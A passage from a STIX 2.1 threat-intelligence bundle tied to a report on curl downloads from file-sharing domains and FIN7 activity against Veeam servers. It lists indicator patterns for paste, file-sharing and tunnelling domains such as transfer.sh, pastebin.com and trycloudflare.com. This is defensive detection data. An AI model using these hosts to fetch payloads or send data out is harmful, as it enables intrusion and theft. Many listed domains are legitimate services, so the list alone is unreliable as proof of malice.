        "indicator--b19f1868-b4c6-530a-aa6f-d61e48807b7b",
        "indicator--75b25e92-a95a-5fdb-bc7e-e65176b1c94b",
        "indicator--aaea3d60-e8a8-5957-b3f2-e7043c325736",
        "indicator--e5b6cb33-c3a1-5d4e-be8c-98de6dc44bc1",
        "indicator--8dc7bc1a-dabb-5c39-94f2-551359a17c70",
        "indicator--afb55c71-8aac-5263-aefa-53c993d55870",
        "indicator--2c715570-7a74-5227-a42f-a299310a63be",
        "indicator--1575c5b8-ad41-5a90-86e9-8cbf1ba44c48",
        "indicator--86185e43-f82e-57e8-a99f-f76e5e7449cb",
        "indicator--b984d5c8-ba2f-5c9f-a6bd-a3b8547556e2",
        "indicator--cda430dd-9283-5904-b3f5-0c06974fe3dc",
        "indicator--9fb25c73-86c8-537a-9649-c6abf47d140e",
        "indicator--9e4b36f6-31ac-50ad-ad2a-e6fa0afba7f7",
        "indicator--f09b697f-e5a7-5776-a493-8c9cf091d54e",
        "indicator--5265b7c8-f709-5190-98a0-e41191d6529c",
        "indicator--eec70cdb-4ec3-541a-af8f-9bb2f987ad60",
        "indicator--78e72751-1ea3-59a9-b7cb-5473954fc047",
        "indicator--be30ecfa-3f17-5e1f-ad47-5af1a6a4f37b",
        "indicator--2a461528-3ed1-54b3-b6f3-6595a83838df",
        "indicator--28bfde1c-f69c-5415-a903-9fed8a9a18b7",
        "indicator--f1a765f6-0249-5482-b63e-e19cd10d0743",
        "indicator--c5969a3e-5b75-5288-9df4-75435e2f0bf3",
        "indicator--613e1729-caec-5ff8-ab92-88558cad68d6",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
        "threat-actor--f3cb2705-f750-5154-b23f-b58902dceddd"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml"
        },
        {
          "source_name": "reference",
          "url": "https://labs.withsecure.com/publications/fin7-target-veeam-servers"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f9216989-676e-5372-b21f-964e0e4a1547",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: .githubusercontent.com",
      "pattern": "[domain-name:value = '.githubusercontent.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b8964e19-c7c8-548e-ba71-ee72b17ca2d9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--f9216989-676e-5372-b21f-964e0e4a1547"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--963dee9e-f930-5bf8-b59c-e72d26d64dd9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: 0x0.st",
      "pattern": "[domain-name:value = '0x0.st']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f1a9a37f-0830-5bf3-86ae-357b43909d71",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--963dee9e-f930-5bf8-b59c-e72d26d64dd9"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7a9ff85e-aa50-5dbf-a2ba-1815c61f34e5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: anonfiles.com",
      "pattern": "[domain-name:value = 'anonfiles.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1425691c-a1b8-58b4-bf19-21c6fb51fb60",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--7a9ff85e-aa50-5dbf-a2ba-1815c61f34e5"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--dfaf4d6e-b1e2-5861-8861-85c5df827c0a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: bashupload.com",
      "pattern": "[domain-name:value = 'bashupload.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6eb39dad-f3a5-5f79-bc64-9583a310c784",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--dfaf4d6e-b1e2-5861-8861-85c5df827c0a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d2a3a3c3-5661-5f3b-83d2-934fc8458113",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: cdn.discordapp.com",
      "pattern": "[domain-name:value = 'cdn.discordapp.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5f487253-3c77-5a6f-919c-e911ab505e4d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--d2a3a3c3-5661-5f3b-83d2-934fc8458113"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--36f4cbe7-f6d6-568e-a6d7-9c6093013595",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: chunk.io",
      "pattern": "[domain-name:value = 'chunk.io']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d7667fef-cb49-557e-9605-45142765114e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--36f4cbe7-f6d6-568e-a6d7-9c6093013595"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--de5caaf3-f606-56a4-a5c3-1975b8a06e47",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ddns.net",
      "pattern": "[domain-name:value = 'ddns.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--01e9aaf2-d74b-5d52-9839-d6a236ca5e6a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--de5caaf3-f606-56a4-a5c3-1975b8a06e47"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f4e4aa07-8d59-519c-aba0-d3137dcf6e1b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: dl.dropboxusercontent.com",
      "pattern": "[domain-name:value = 'dl.dropboxusercontent.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--80764ed2-f25f-5121-94c2-40df2085d7e3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--f4e4aa07-8d59-519c-aba0-d3137dcf6e1b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1725ec52-f6a0-574a-bfb7-c237eed66d1f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ghostbin.co",
      "pattern": "[domain-name:value = 'ghostbin.co']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7aba7ab0-0168-551b-94e2-9fb9fe26f251",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--1725ec52-f6a0-574a-bfb7-c237eed66d1f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0f149b73-e63e-567f-b42b-34a204cd0938",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: github.com",
      "pattern": "[domain-name:value = 'github.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--00c22038-bcf0-54a3-b6c3-756b7d6f9f1c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--0f149b73-e63e-567f-b42b-34a204cd0938"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--fc9ad452-6edb-55c2-a7d9-7c925f3f4e68",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: glitch.me",
      "pattern": "[domain-name:value = 'glitch.me']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7994a635-b5a2-5be9-a187-e4881bd1c68f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--fc9ad452-6edb-55c2-a7d9-7c925f3f4e68"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--836011b4-e2d4-5f46-ba0a-8e51c0e127d3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: gofile.io",
      "pattern": "[domain-name:value = 'gofile.io']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9eb244ca-5058-5b35-ba82-2f4c3815d50f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--836011b4-e2d4-5f46-ba0a-8e51c0e127d3"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d2366788-425e-5596-aaa0-f404b4a83836",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: hastebin.com",
      "pattern": "[domain-name:value = 'hastebin.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8c10ef4c-641f-5431-b200-c88fd24d74a5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--d2366788-425e-5596-aaa0-f404b4a83836"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7b04afd9-8810-5cd5-a89a-8184fe98819b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: mediafire.com",
      "pattern": "[domain-name:value = 'mediafire.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a551245d-53c0-5645-895b-e5d68e6facb0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--7b04afd9-8810-5cd5-a89a-8184fe98819b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4f581373-6ce1-587e-8d4d-cd90029ac827",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: mega.nz",
      "pattern": "[domain-name:value = 'mega.nz']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3cfcc56e-b247-5b17-bf09-9bc2bb60461f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--4f581373-6ce1-587e-8d4d-cd90029ac827"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e3d514d6-f41b-5539-af26-db463ab6db94",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: onrender.com",
      "pattern": "[domain-name:value = 'onrender.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--30080803-2c67-54b4-b0cf-65b63110cf2a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--e3d514d6-f41b-5539-af26-db463ab6db94"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d569a035-2ed1-5397-b8cc-db96b1eda11c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: pages.dev",
      "pattern": "[domain-name:value = 'pages.dev']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c77c9653-25ca-515a-86a6-a5263fc91f39",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--d569a035-2ed1-5397-b8cc-db96b1eda11c"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--bbb70ffb-3e04-5745-adba-07ca12299f51",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: paste.ee",
      "pattern": "[domain-name:value = 'paste.ee']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d9f00f97-9f33-57bf-8c4b-a073665d6561",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--bbb70ffb-3e04-5745-adba-07ca12299f51"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4574ef47-0c47-5601-8397-681eb689ac49",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: pastebin.com",
      "pattern": "[domain-name:value = 'pastebin.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9d969c8e-402e-581f-a4fb-43a1f581f8c9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--4574ef47-0c47-5601-8397-681eb689ac49"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0ee12b46-01a7-5706-ba1b-af129c4c1a37",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: pastebin.pl",
      "pattern": "[domain-name:value = 'pastebin.pl']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--33379397-8f0f-592f-8e4c-d226ea3577e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--0ee12b46-01a7-5706-ba1b-af129c4c1a37"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--43498925-a824-51c7-be50-ffc1302e602f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: pastetext.net",
      "pattern": "[domain-name:value = 'pastetext.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--dd14fca8-bb60-51e6-9e5e-c34fd361e12e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--43498925-a824-51c7-be50-ffc1302e602f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7427cd55-0592-5e99-98e6-c9aef81ab814",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: privatlab.com",
      "pattern": "[domain-name:value = 'privatlab.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--111aa474-c14f-53c4-8fee-91058c35bc9c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--7427cd55-0592-5e99-98e6-c9aef81ab814"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9955a7f5-4f1c-5234-88bd-4331d0bb2b5a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: privatlab.net",
      "pattern": "[domain-name:value = 'privatlab.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f1e8b7aa-54af-568d-9292-05f2e91312f6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--9955a7f5-4f1c-5234-88bd-4331d0bb2b5a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1c7bbd6b-4d15-5264-a921-53290ecfc73a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: send.exploit.in",
      "pattern": "[domain-name:value = 'send.exploit.in']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--eabea705-cf26-5fb1-bcf9-ac3578454050",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--1c7bbd6b-4d15-5264-a921-53290ecfc73a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--75dee77e-0a1e-5224-adfd-317cad156d3f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: sendspace.com",
      "pattern": "[domain-name:value = 'sendspace.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9af1aeaa-9cbe-54d7-bcd2-d95b92000729",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--75dee77e-0a1e-5224-adfd-317cad156d3f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f9e2acde-c56c-5e04-af22-951caefb7d8e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: storage.googleapis.com",
      "pattern": "[domain-name:value = 'storage.googleapis.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ebb2f3ca-c95c-5ef6-b76e-0375835a4b98",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--f9e2acde-c56c-5e04-af22-951caefb7d8e"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--823c2fc7-3a10-5efe-8a03-8b2fb903396f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: storjshare.io",
      "pattern": "[domain-name:value = 'storjshare.io']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6c5e2e06-0d33-5bfc-926f-bb6b1cad4525",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--823c2fc7-3a10-5efe-8a03-8b2fb903396f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c07aff80-4bc7-5af5-993b-fd6bb7d4bdd8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: supabase.co",
      "pattern": "[domain-name:value = 'supabase.co']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3a0fbc46-b882-5148-9eaa-4e34b9d04c2e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--c07aff80-4bc7-5af5-993b-fd6bb7d4bdd8"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1c484533-f317-5f93-832f-96c931b02a2a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: temp.sh",
      "pattern": "[domain-name:value = 'temp.sh']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fa89c3c1-1d1f-5e2b-ad17-b26660bd9b50",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--1c484533-f317-5f93-832f-96c931b02a2a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--83fc9b8a-09f4-5185-9e18-a7d8233ed532",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: transfer.sh",
      "pattern": "[domain-name:value = 'transfer.sh']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ae28fc4f-84e0-56ca-954b-9839810dfb8d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--83fc9b8a-09f4-5185-9e18-a7d8233ed532"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--abbed01e-fa1a-57ec-8310-17a86a6f7ecc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: trycloudflare.com",
      "pattern": "[domain-name:value = 'trycloudflare.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--256d526a-2334-5d90-9849-45dd073206dc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--abbed01e-fa1a-57ec-8310-17a86a6f7ecc"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--51a0b103-3bcc-5532-ab4f-99971c6ee541",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ufile.io",
      "pattern": "[domain-name:value = 'ufile.io']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8eae8116-7d3f-5e1d-897c-0ea0dfcd7c9e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--51a0b103-3bcc-5532-ab4f-99971c6ee541"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--aed7df0e-f8f7-52cb-b1ba-03453883e67d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: w3spaces.com",
      "pattern": "[domain-name:value = 'w3spaces.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--581bf744-346b-5198-a535-10cf81b4f9ac",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--aed7df0e-f8f7-52cb-b1ba-03453883e67d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ff6f3b0a-5e90-59d6-995b-c8ee297a6cae",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: workers.dev",
      "pattern": "[domain-name:value = 'workers.dev']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ec8a1c4d-55fe-5fcf-9c95-9d7ff3323bb0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--ff6f3b0a-5e90-59d6-995b-c8ee297a6cae"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c2624b1d-3615-52ca-a627-bd23d77c8f55",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: x0.at",
      "pattern": "[domain-name:value = 'x0.at']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:09:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--980220bd-812f-555c-b200-b59cc8ab47f8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c1465ad-5f25-5bd0-a7c3-2bb75addb029",
      "target_ref": "indicator--c2624b1d-3615-52ca-a627-bd23d77c8f55"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
      "created": "2026-07-09T17:20:22Z",
